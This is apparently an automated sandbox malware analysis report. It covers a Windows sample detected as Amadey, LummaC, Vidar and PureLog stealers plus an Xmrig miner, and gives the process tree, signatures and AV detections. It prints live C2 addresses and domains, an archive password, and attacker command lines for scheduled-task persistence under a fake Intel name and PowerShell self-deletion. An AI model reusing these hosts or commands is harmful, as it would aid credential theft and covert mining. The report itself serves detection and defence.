Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1575244
MD5:	524aff0ae21cf7d4731596e8f3967e32
SHA1:	27a75996dfd0ae578e28613f275b0517c0bbd975
SHA256:	a9ce24b52ece47dfb287b912c5223c5b659df5c2fece87141dfa5820ecda23fd
Infos:

Detection

ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected Vidar stealer

Yara detected Xmrig cryptocurrency miner

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Creates files in the system32 config directory

Drops password protected ZIP file

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Found strings related to Crypto-Mining

Hides threads from debuggers

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses ping.exe to check the status of other devices and networks

Uses schtasks.exe or at.exe to add and modify task schedules

Writes many files with high entropy

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected ScreenConnect Tool

Yara signature match

Classification

Process Tree

System is w10x64native

file.exe (PID: 6748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 524AFF0AE21CF7D4731596E8F3967E32)

skotes.exe (PID: 6140 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 524AFF0AE21CF7D4731596E8F3967E32)

skotes.exe (PID: 1256 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 524AFF0AE21CF7D4731596E8F3967E32)

skotes.exe (PID: 8536 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 524AFF0AE21CF7D4731596E8F3967E32)

0d47c4c34f.exe (PID: 8708 cmdline: "C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe" MD5: 4765874B881A2BCE3AAEFB16805EF1A5)

axplong.exe (PID: 8880 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 4765874B881A2BCE3AAEFB16805EF1A5)

C1J7SVw.exe (PID: 8908 cmdline: "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)

cmd.exe (PID: 9200 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

mode.com (PID: 8144 cmdline: mode 65,10 MD5: 59D1ED51ACB8C3D50F1306FD75F20E99)

7z.exe (PID: 908 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 1088 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 4484 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6748 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 3596 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 4920 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 3544 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 3040 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

attrib.exe (PID: 7196 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

in.exe (PID: 928 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)

attrib.exe (PID: 7180 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

attrib.exe (PID: 1360 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

schtasks.exe (PID: 8236 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 796B784E98008854C27F4B18D287BA30)

conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6644 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

PING.EXE (PID: 7720 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

b1dc05533c.exe (PID: 7004 cmdline: "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

conhost.exe (PID: 3536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

b1dc05533c.exe (PID: 6412 cmdline: "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

dwVrTdy.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe" MD5: 3567CB15156760B2F111512FFDBC1451)

graph.exe (PID: 1400 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

AzVRM7c.exe (PID: 2492 cmdline: "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe" MD5: 3567CB15156760B2F111512FFDBC1451)

t5abhIx.exe (PID: 1548 cmdline: "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe" MD5: 3567CB15156760B2F111512FFDBC1451)

LoaderClient.exe (PID: 8500 cmdline: "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe" MD5: EC1C0306004DB340A454EEAC2ABEDA4A)

LoaderClient.exe (PID: 8172 cmdline: "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe" MD5: EC1C0306004DB340A454EEAC2ABEDA4A)

cmd.exe (PID: 8424 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Bxq1jd2.exe (PID: 4932 cmdline: "C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe" MD5: 876A365BDA09B9EF39605E375D677F0A)

axplong.exe (PID: 9040 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 4765874B881A2BCE3AAEFB16805EF1A5)

Intel_PTT_EK_Recertification.exe (PID: 1488 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)

explorer.exe (PID: 7840 cmdline: explorer.exe MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

powershell.exe (PID: 5448 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

PING.EXE (PID: 4156 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

dwVrTdy.exe (PID: 6596 cmdline: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe MD5: 3567CB15156760B2F111512FFDBC1451)

graph.exe (PID: 2756 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

graph.exe (PID: 1568 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

graph.exe (PID: 8112 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Threatname: LummaC

{"C2 url": ["print-vexer.biz", "dwell-exclaim.biz", "se-blurry.biz", "impend-differ.biz", "covery-mover.biz", "formy-spill.biz", "drive-connect.cyou", "zinc-sneark.biz", "dare-curbys.biz"], "Build id": "FATE99--test"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.268855891646.0000000005400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000030.00000002.270506120282.00000000025D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000002.269554816675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000030.00000002.270498807238.0000000000899000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xb90:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000004.00000003.269317871785.0000000004920000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000003.269406632525.0000000005080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.269472681805.00000000053F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.268839327195.00000000048B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000003.00000003.268857006626.0000000005370000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000023.00000002.269556913458.000000014040B000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000006.00000003.269465852321.0000000004B30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
Process Memory Space: b1dc05533c.exe PID: 6412	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: b1dc05533c.exe PID: 6412	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 1488	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: explorer.exe PID: 7840	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.axplong.exe.630000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.9c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
5.2.0d47c4c34f.exe.b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.axplong.exe.630000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.660000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.9c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x325978:$s1: %s/%s (Windows NT %lu.%lu 0x329580:$s3: \\.\WinRing0_ 0x2e3130:$s4: pool_wallet 0x2dd978:$s5: cryptonight 0x2dd988:$s5: cryptonight 0x2dd998:$s5: cryptonight 0x2dd9a8:$s5: cryptonight 0x2dd9c0:$s5: cryptonight 0x2dd9d0:$s5: cryptonight 0x2dd9e0:$s5: cryptonight 0x2dd9f8:$s5: cryptonight 0x2dda08:$s5: cryptonight 0x2dda20:$s5: cryptonight 0x2dda38:$s5: cryptonight 0x2dda48:$s5: cryptonight 0x2dda58:$s5: cryptonight 0x2dda68:$s5: cryptonight 0x2dda80:$s5: cryptonight 0x2dda98:$s5: cryptonight 0x2ddaa8:$s5: cryptonight 0x2ddab8:$s5: cryptonight
34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x324cc8:$x1: donate.ssl.xmrig.com
35.2.explorer.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.2.explorer.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
35.2.explorer.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files\Windows Media Player\graph\graph.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe, ProcessId: 3532, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 928, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 8236, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 928, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 6644, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: dare-curbys.biz	Avira URL Cloud: Label: malware
Source: formy-spill.biz	Avira URL Cloud: Label: malware
Source: https://drive-connect.cyou/api	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Avira: detection malicious, Label: TR/AD.Nekark.eiqyn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exe	Avira: detection malicious, Label: TR/AD.Nekark.eiqyn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe	Avira: detection malicious, Label: HEUR/AGEN.1306956
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
